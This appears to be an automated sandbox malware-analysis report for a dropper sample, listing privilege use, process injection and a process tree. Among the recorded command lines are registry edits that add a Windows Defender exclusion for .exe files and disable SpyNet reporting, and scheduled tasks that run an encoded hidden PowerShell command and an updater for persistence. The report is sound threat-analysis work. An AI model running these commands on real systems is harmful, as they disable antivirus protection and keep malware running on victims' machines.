N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1512 wrote to memory of 832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
PID 1512 wrote to memory of 832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
PID 1512 wrote to memory of 832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
PID 1512 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
PID 1512 wrote to memory of 2980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
PID 1512 wrote to memory of 2980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
PID 1512 wrote to memory of 4912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
PID 1512 wrote to memory of 4912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
PID 1512 wrote to memory of 4912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
PID 1512 wrote to memory of 1464 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
PID 1512 wrote to memory of 1464 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
PID 1512 wrote to memory of 1464 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 832 wrote to memory of 856 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.0.exe
PID 832 wrote to memory of 856 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.0.exe
PID 832 wrote to memory of 856 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.0.exe
PID 1512 wrote to memory of 1352 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
PID 1512 wrote to memory of 1352 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
PID 1512 wrote to memory of 1352 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
PID 832 wrote to memory of 4232 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.1.exe
PID 832 wrote to memory of 4232 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.1.exe
PID 832 wrote to memory of 4232 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.1.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1512 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe
PID 1512 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe
PID 4232 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1512 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1512 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1880 wrote to memory of 2260 N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1880 wrote to memory of 2260 N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1880 wrote to memory of 2260 N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1604 wrote to memory of 4948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 1604 wrote to memory of 4948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe

"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe

"C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe"

C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe

"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"

C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe

"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"

C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe

"C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe"

C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe

"C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 884

C:\Users\Admin\AppData\Local\Temp\un4.0.exe

"C:\Users\Admin\AppData\Local\Temp\un4.0.exe"

C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe

"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"

C:\Users\Admin\AppData\Local\Temp\un4.1.exe

"C:\Users\Admin\AppData\Local\Temp\un4.1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 832 -ip 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 1512

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe

"C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 616

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 648

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --silent --allusers=0

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6deae1a8,0x6deae1b4,0x6deae1c0

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --version

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1880 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142129" --session-guid=647b75d8-1d1a-401a-8239-98e5764e4505 --server-tracking-blob=Y2U2YTQyN2U5YjVmMmQ4YzU0ZTRjN2ZmZmY2YTQzODczNjNmOTVjMWM0ZWYzNWJjNGQyOWUxMzUxZTcxNzA5Yzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzU2ODAuNDc4OCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjdiOTU1ZDA5LTk4ZjktNDFhYy05MjA2LWQwOTBkM2FiMTJmMyJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B005000000000000

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d52e1a8,0x6d52e1b4,0x6d52e1c0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1464 -ip 1464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 1156

C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe

"C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe

"C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gDKGtXeHw" /SC once /ST 07:43:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gDKGtXeHw"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

